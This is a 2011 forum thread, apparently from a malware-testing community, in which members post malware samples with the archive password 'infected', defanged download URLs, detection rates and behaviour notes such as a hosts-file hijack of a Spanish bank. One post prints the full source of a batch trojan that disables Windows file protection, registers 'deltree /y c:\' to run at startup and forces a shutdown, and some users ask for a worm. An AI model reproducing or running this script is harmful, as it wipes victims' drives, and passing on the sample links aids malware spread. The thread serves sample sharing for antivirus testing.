Re: Found virus? Post it here!


Dropped by fake VirusTotal on website hxxp://new-virustotal.tk/
WARNING: Might be alive. Do not visit!

http://i1104.photobucket.com/albums/h336/Kobayashi1947/ScreenHunter_01May222002.gif

Download:
[Register or log in to view the URL]

pass: infected

More here:  [Register or log in to view the URL]

Last edited by Kobayashi (2011-05-24 15:37:31)

Re: Found virus? Post it here!

virus.vb.ml

At the end of the infected file we get a pattern like "By ??" and 31 38 37 ...

Is this where the virus stores info about the file?

Please check it out.

Post's attachments

vb.ml 28 kb, 15 downloads since 2011-05-23 


Re: Found virus? Post it here!

Following link from Yahoo spam.
http://i1104.photobucket.com/albums/h336/Kobayashi1947/ScreenHunter_04May231104.gif

hxxp://www.wartaki.pl/modules/Media_Player.exe

Media_Player.exe can be downloaded. Detection rate by VirusTotal is low (2.4 %)

On execution Media_Player.exe drops Seguridad.exe and a startup key for this file is added to the registry.
Detection rate for this file is also low. (2.4%)

Download both files:
[Register or log in to view the URL]
pass: infected

Last edited by Kobayashi (2011-05-23 20:08:49)

Re: Found virus? Post it here!

Attachment from mail FedEx mail.exe  (23.8 %)

Disables Taskmanager
A startup key is added to the registry

Downloaded from hxxp://variantov.com / dropped files:

094e5402d.exe  (9.5 %)
Adobe_Flash_Player.exe  (23.8 %)
pusk.exe  (31.7 %)
tKBeGFnootVpbn.exe  (4.8 %)
trol.exe  (39.5 %)

Download all files:
[Register or log in to view the URL]
password: infected

Last edited by Kobayashi (2011-05-25 20:09:03)

Re: Found virus? Post it here!

Some viruses are harmful for the computer. When we test it on the computer, more information will be found.

Re: Found virus? Post it here!

Trojan KillFiles

Post's attachments

kill.zip 338.32 kb, 29 downloads since 2011-05-26 

Avast! Internet Security 6 + Emsisoft Mamutu 3 + Hitman Pro 3.5 (On-Demand)

Re: Found virus? Post it here!

From Spam sent by Amor Secreto te-amo@amorr.es
Link in mail downloads from hxxp://www.alabai-montenegro.com/includes/PEAR/te-amo.exe

VirusTotal Report:
[Register or log in to view the URL]

C:\Windows\System32\drivers\etc\hosts is changed.
72.55.186.5 bancopopular.es
72.55.186.5 [Register or log in to view the URL]

[Register or log in to view the URL]
is contacted

The Volk-Panel Control System on [Register or log in to view the URL]
http://i1104.photobucket.com/albums/h336/Kobayashi1947/ScreenHunter_01May291418.gif

Download:
[Register or log in to view the URL]
password: infected

Last edited by Kobayashi (2011-05-29 14:48:13)

Re: Found virus? Post it here!

Trojan Otlard

Post's attachments

blog.zip 142.23 kb, 27 downloads since 2011-05-29 


Re: Found virus? Post it here!

New Win Lock

Post's attachments

porn2o-rolik2.avi.zip 68.65 kb, 32 downloads since 2011-05-29 


Re: Found virus? Post it here!

Detected as  "Win32/Agent.SOE" by NOD32

Post's attachments

atomic.word.password.recovery.registration.code.keygen.by.DBC.zip 100.32 kb, 32 downloads since 2011-05-29 


Re: Found virus? Post it here!

From spam attachment DHL mail.zip.
http://i1104.photobucket.com/albums/h336/Kobayashi1947/ScreenHunter_01May311056.gif

VirusTotal (41.9 %)

File is downloaded from hxxp://variantov.com/pusk.exe  pusk[1].exe

Task manager is disabled.
Startup key is added to the registry.

Attempts to load a system driver.
This gave a BSOD on my virtual machine.
Can anybody upload 1294.sys?

Threatexpert:
[Register or log in to view the URL]

Anubis failed.

Download both files.
[Register or log in to view the URL]
password: infected

Last edited by Kobayashi (2011-05-31 12:02:06)

Re: Found virus? Post it here!

Trojan Mebroot

Post's attachments

Mebroot.zip 350.13 kb, 24 downloads since 2011-06-01 


Re: Found virus? Post it here!

Attached file from Yahoo mail Tracking.zip

http://i1104.photobucket.com/albums/h336/Kobayashi1947/ScreenHunter_01Jun010916.gif

VirusTotal:
[Register or log in to view the URL]

A file is downloaded from hxxp://miliardov.com/pusk3.exe
Attempts to install a driver (rootkit)

Download:
[Register or log in to view the URL]

Password: infected

Last edited by Kobayashi (2011-06-01 12:46:39)

Re: Found virus? Post it here!

These viruses are great. (My English is not good.) I want fake AV because that's very funny, but I haven't five posts, so no download... Please share virus download link...

Re: Found virus? Post it here!

From spam.
hxxp://187.61.5.26/~xsoftcom/images/FOTOS_DSC_JPG.php?0.47634

VirusTotal:
[Register or log in to view the URL]

password: infected

Post's attachments

Arq_DSC_98737361_jpp.rar 74.94 kb, 28 downloads since 2011-06-07 


Re: Found virus? Post it here!

I need a worm for ms067, thank you!

Re: Found virus? Post it here!

Wow, so many viruses over here

__________________
Things hardly attained,
Are long retained.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Re: Found virus? Post it here!

I downloaded all the files uploaded. Is there a problem with the archives? Because whichever file I try to download, I am getting a message that it is corrupted or damaged. Is anybody else facing the problem or is it just me?

Last edited by icr (2011-07-20 17:31:49)

[Register or log in to view the URL] (site is free for uploading and unlimited downloading)

--->[Register or log in to view the URL]<---- (updated 22nd Sep)

Re: Found virus? Post it here!

Some rogue program

1. Security essential 2011
2. (This one I can't recollect, but it's a pretty nasty one because it doesn't require a restart of your system to disable your security applications and even your task manager.)

Have fun testing;)

Last edited by icr (2011-07-21 20:23:50)

Post's attachments

2 programs.zip 4.88 mb, 22 downloads since 2011-07-21 


Re: Found virus? Post it here!

Trojan.Aziz:
---
::Trojan.Aziz by Gangbang 2008
@echo off
echo Aziz will fuck you all!!! > %TEMP%\aziz.reg
echo. >> %TEMP%\aziz.reg
echo ;Trojan.aziz by Gangbang >> %TEMP%\aziz.reg
echo [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> %TEMP%\aziz.reg
echo "SFCDisable"=dword:ffffff9d >> %TEMP%\aziz.reg
echo. >> %TEMP%\aziz.reg
regedit /s %TEMP%\aziz.reg

@echo off
echo. >> %TEMP%\aziz1.reg
echo ;Trojan.aziz by Gangbang >> %TEMP%\aziz1.reg
echo [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RunServices] >> %TEMP%\aziz1.reg
echo "aziz"=sz:deltree /y c:\ >> %TEMP%\aziz1.reg
echo. >> %TEMP%\aziz1.reg
regedit /s %TEMP%\aziz1.reg

shutdown -s -f -t 10 "Aziz will fuck you all..."
---
atm detected as:

AhnLab-V3    2011.07.23.00    2011.07.22    BAT/Agent
AntiVir    7.11.12.64    2011.07.22    BDS/Agent.DG.1
Antiy-AVL    2.0.3.7    2011.07.22    Trojan/BAT.Agent
Avast    4.8.1351.0    2011.07.22    VBS:Malware-gen
Avast5    5.0.677.0    2011.07.22    VBS:Malware-gen
AVG    10.0.0.1190    2011.07.23    -
BitDefender    7.2    2011.07.22    Trojan.Script.14894
CAT-QuickHeal    11.00    2011.07.22    -
ClamAV    0.97.0.0    2011.07.22    Trojan.BAT.Aziz
Commtouch    5.3.2.6    2011.07.22    -
Comodo    9473    2011.07.22    TrojWare.BAT.Agent.dg
DrWeb    5.0.2.03300    2011.07.23    -
Emsisoft    5.1.0.8    2011.07.22    Trojan.BAT.Agent!IK
eSafe    7.0.17.0    2011.07.21    -
eTrust-Vet    36.1.8459    2011.07.22    -
F-Prot    4.6.2.117    2011.07.22    -
F-Secure    9.0.16440.0    2011.07.23    Trojan.Script.14894
Fortinet    4.2.257.0    2011.07.22    -
GData    22    2011.07.22    Trojan.Script.14894
Ikarus    T3.1.1.104.0    2011.07.22    Trojan.BAT.Agent
Jiangmin    13.0.900    2011.07.22    -
K7AntiVirus    9.108.4937    2011.07.22    -
Kaspersky    9.0.0.837    2011.07.23    Trojan.BAT.Agent.dg
McAfee    5.400.0.1158    2011.07.23    Unsafe Bat-b
McAfee-GW-Edition    2010.1D    2011.07.22    -
Microsoft    1.7104    2011.07.22    -
NOD32    6317    2011.07.22    -
Norman    6.07.10    2011.07.22    -
nProtect    2011-07-22.01    2011.07.22    -
Panda    10.0.3.5    2011.07.22    -
PCTools    8.0.0.5    2011.07.22    -
Prevx    3.0    2011.07.23    -
Rising    23.67.04.03    2011.07.22    -
Sophos    4.67.0    2011.07.22    Troj/Deltree-X
SUPERAntiSpyware    4.40.0.1006    2011.07.22    -
Symantec    20111.1.0.186    2011.07.22    -
TheHacker    6.7.0.1.260    2011.07.22    Bat/Generic
TrendMicro    9.200.0.1012    2011.07.22    -
TrendMicro-HouseCall    9.200.0.1012    2011.07.23    -
VBA32    3.12.16.4    2011.07.22    Trojan.BAT.Agent.dg
VIPRE    9935    2011.07.23    -
ViRobot    2011.7.22.4583    2011.07.22    -
VirusBuster    14.0.134.1    2011.07.22    -

Re: Found virus? Post it here!

XP 2012 Rogue application (BSA report is included)

[Register or log in to view the URL]

Password : infected

Last edited by icr (2011-07-30 21:23:16)

Post's attachments

AA2C4196836614A05BD65C7FD823DE4E.zip 281.07 kb, 6 downloads since 2011-07-30 


Re: Found virus? Post it here!

Some more programs that I found while surfing the internet;)

[Register or log in to view the URL]

[Register or log in to view the URL]

[Register or log in to view the URL]

[Register or log in to view the URL]

(All have corresponding BSA reports included)

Last edited by icr (2011-07-30 21:46:13)


Re: Found virus? Post it here!

cool

Re: Found virus? Post it here!

A nasty program on one of my client's PCs. I used a live CD to quarantine it, due to which I was able to store it.

[Register or log in to view the URL]  (BSA report included)

password : infected


Re: Found virus? Post it here!

You can find viruses on my MediaFire; I update daily.

[Register or log in to view the URL]

The pass to download and decompress is in the pass.txt file in the Virus folder!